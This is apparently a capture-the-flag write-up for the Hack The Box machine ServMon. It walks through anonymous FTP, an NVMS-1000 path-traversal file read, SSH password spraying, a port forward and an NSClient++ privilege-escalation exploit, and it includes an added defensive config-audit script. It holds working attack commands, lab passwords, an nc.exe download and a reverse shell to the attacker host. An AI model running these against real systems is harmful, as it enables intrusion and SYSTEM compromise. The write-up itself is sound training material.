ServMon Writeup

19 February 2023 #CTF #HTB #box #easy #windows

servmon info

Enumeration

You already know, it's nmap time:

$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap 10.10.10.184
[...]
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM       <DIR>          Users
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c71af681ca1778d027dbcd462a092b54 (RSA)
|   256 3e63ef3b6e3e4a90f34c02e940672e42 (ECDSA)
|_  256 5a48c8cd39782129effbae821d03adaf (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-02-10T13:38:45
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
[...]

FTP

As nmap told us, we can log in anonymously to this FTP server. Inside the Users folder there are two other folders:

ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan

Two potential usernames. Looking in Nadine's directory, there is just one text file:

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Okay, so there is a file called Passwords.txt on Nathan's Desktop.

In Nathan's directory there is also one text file:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

SMB

Unlike with FTP, we can't access SMB anonymously:

$ smbclient -NL 10.10.10.184
session setup failed: NT_STATUS_ACCESS_DENIED
$ rpcclient -U '%' -N 10.10.10.184
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

HTTP

Port 80

We get a login page:

NVMS-1000 login

Trying default credentials here is unlikely to work: the to-do list in Nathan's FTP folder says the NVMS password has already been changed.

Port 8443

Here we (are supposed to) have a network monitoring application:

NSClient++

The page was kinda broken for me.

Foothold

LFI in NVMS-1000

Looking for known vulnerabilities in NVMS-1000, we come across a directory traversal in the web server's request path (usually listed as an LFI): ../ sequences in the path are resolved against the filesystem without checking that the result stays under the web root, and no authentication is needed.

Let's see if it works by trying to read the Passwords.txt file on Nathan's desktop. The --path-as-is flag matters: without it curl collapses the ../ segments before sending the request, and the server would only ever see a normalised path that never leaves the web root:

$ curl -s --path-as-is 'http://10.10.10.184/../../../../../../../../../../../../users/nathan/desktop/passwords.txt'
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Nice, we get a bunch of passwords!

Password Spraying

With a password list and two usernames, we can try every password against each user and hope for the best (on a lab box we don't care about lockouts; on a real domain you would). SSH is listening on this Windows box so we'll try it first:

$ cme ssh 10.10.10.184 -u users.txt -p passwords.txt
SSH         10.10.10.184    22     10.10.10.184     [*] SSH-2.0-OpenSSH_for_Windows_8.0
SSH         10.10.10.184    22     10.10.10.184     [-] Nadine:1nsp3ctTh3Way2Mars! Authentication failed.
SSH         10.10.10.184    22     10.10.10.184     [-] Nadine:Th3r34r3To0M4nyTrait0r5! Authentication failed.
SSH         10.10.10.184    22     10.10.10.184     [-] Nadine:B3WithM30r4ga1n5tMe Authentication failed.
SSH         10.10.10.184    22     10.10.10.184     [+] Nadine:L1k3B1gBut7s@W0rk

Great, we can log in as Nadine.

Privesc

We can find the NSClient++ config file in C:\Program Files\NSClient++\nsclient.ini:

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
[...]
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1
[...]

So we have the password for the NSClient++ web interface, but allowed hosts = 127.0.0.1 means the service only accepts connections from localhost. Even with the correct password we can't reach it from our attack box; this is the "Lock down the NSClient Access - Complete" item from Nathan's to-do list on the FTP server.
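It's worth having a quick way to audit this file, since the same nsclient.ini is what the exploit later modifies (it saves the new external script into the config, so the artifact survives a reboot). The script below is an added example, not part of this writeup and not NSClient++ tooling: the sample config is constructed, only password and allowed hosts are the values from the box, and the module name, the allow arguments key, the script entries and the section the exploit's saved script lands in are assumed typical NSClient++ settings.

```python
"""Quick audit of an NSClient++ nsclient.ini for the weaknesses this box relies on.

Added example for this writeup; not the author's tooling and not part of NSClient++.
"""
import configparser
from typing import Dict, List, Set

# Constructed sample in nsclient.ini's layout. Only `password` and
# `allowed hosts` are the values seen on the box; the other sections and keys
# are assumed typical entries. The last script entry is where the exploit's
# saved script (name PFvFSEzz in the run above) is assumed to land.
SAMPLE_INI = """\
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

[/modules]
CheckExternalScripts = enabled
WEBServer = enabled

[/settings/external scripts]
allow arguments = true

[/settings/external scripts/scripts]
check_backup = scripts\\check_backup.bat
PFvFSEzz = ping -n 2 10.10.14.4
"""

LOOPBACK: Set[str] = {"127.0.0.1", "::1", "localhost"}
SCRIPTS_SECTION = "/settings/external scripts/scripts"
# Scripts an operator knowingly deployed (assumed allowlist for this sample).
KNOWN_SCRIPTS: Set[str] = {"check_backup"}


def load_nsclient_ini(text: str) -> configparser.ConfigParser:
    """Parse the file: ';' full-line comments, '/'-style sections, spaces in key names."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def audit(cp: configparser.ConfigParser) -> Dict[str, object]:
    """Collect the settings that decide who can reach the API and what it can run."""
    raw_hosts = cp.get("/settings/default", "allowed hosts", fallback="")
    hosts = {h.strip() for h in raw_hosts.split(",") if h.strip()}
    password_in = [s for s in ("/settings/default", "/settings/WEB/server")
                   if cp.has_option(s, "password")]
    scripts = dict(cp.items(SCRIPTS_SECTION)) if cp.has_section(SCRIPTS_SECTION) else {}
    known = {s.lower() for s in KNOWN_SCRIPTS}   # configparser lower-cases keys
    return {
        "plaintext_password_in": password_in,
        "allowed_hosts": hosts,
        "loopback_only": bool(hosts) and hosts <= LOOPBACK,
        "external_scripts_enabled":
            cp.get("/modules", "CheckExternalScripts", fallback="disabled").strip().lower() == "enabled",
        "allow_arguments": cp.getboolean("/settings/external scripts", "allow arguments", fallback=False),
        "scripts": scripts,
        "unexpected_scripts": sorted(set(scripts) - known),
    }


def report(result: Dict[str, object]) -> List[str]:
    """Turn the audit dict into one finding per line."""
    lines: List[str] = []
    for section in result["plaintext_password_in"]:
        lines.append(f"[{section}] stores the API password in plaintext; anyone who can read the file can use it")
    if result["loopback_only"]:
        lines.append("allowed hosts is loopback only: remote clients are blocked, but any local account "
                     "can still reach the API, e.g. through an SSH -L forward")
    elif result["allowed_hosts"]:
        lines.append(f"allowed hosts permits remote clients: {sorted(result['allowed_hosts'])}")
    if result["external_scripts_enabled"]:
        lines.append("CheckExternalScripts is enabled: the API password alone is enough to run commands as the service account")
    if result["allow_arguments"]:
        lines.append("allow arguments = true: callers may pass arguments into external scripts")
    for name in result["unexpected_scripts"]:
        lines.append(f"unrecognised external script {name!r}: {result['scripts'][name]}")
    return lines


if __name__ == "__main__":
    for line in report(audit(load_nsclient_ini(SAMPLE_INI))):
        print("-", line)
```

On the box itself you would feed it the real file (`audit(load_nsclient_ini(open(path).read()))`); the unexpected_scripts list is the one-line check for an entry like PFvFSEzz that the exploit leaves behind after "Saving Configuration".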

Luckily, we can use SSH to forward a local port:

$ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
nadine@10.10.10.184's password:
[...]

This listens on port 8443 on our attack box and tunnels every connection through the SSH session to 127.0.0.1:8443 on the target. NSClient++ sees the connection arriving on its own loopback interface, so the allowed hosts restriction is satisfied.

We can use a public exploit script for NSClient++ (cve.py below) to register a custom external script in its configuration; NSClient++ runs as a Windows service under NT AUTHORITY\SYSTEM, so the script's command runs as that account. The output shows the steps: authenticate with the password, enable the external scripts module, add a script whose command is our payload, save and reload the configuration, then trigger the script through the API. Start with a ping to prove execution:

$ ./cve.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'ping -n 2 10.10.14.4'
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: PFvFSEzz)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .

After a few seconds we get something in tcpdump:

$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:01:24.046322 IP 10.10.10.184 > 10.10.14.4: ICMP echo request, id 1, seq 1, length 40
14:01:24.046364 IP 10.10.14.4 > 10.10.10.184: ICMP echo reply, id 1, seq 1, length 40
14:01:25.131476 IP 10.10.10.184 > 10.10.14.4: ICMP echo request, id 1, seq 2, length 40
14:01:25.131501 IP 10.10.14.4 > 10.10.10.184: ICMP echo reply, id 1, seq 2, length 40

This confirms we can execute commands on the box through NSClient++.

To get a reverse shell we'll upload nc.exe to the box from the SSH session as Nadine, pulling it from a web server on our attack box:

nadine@SERVMON C:\Users\Nadine\Downloads>curl.exe 10.10.14.4/nc.exe -O
[...]

And now we can just execute it via the exploit script:

$ ./cve.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'C:\Users\Nadine\Downloads\nc.exe 10.10.14.4 443 -e cmd.exe'
[...]

Again, wait a few seconds and enjoy the reverse shell as NT AUTHORITY\SYSTEM:

$ nc -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50613.
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

Key Takeaways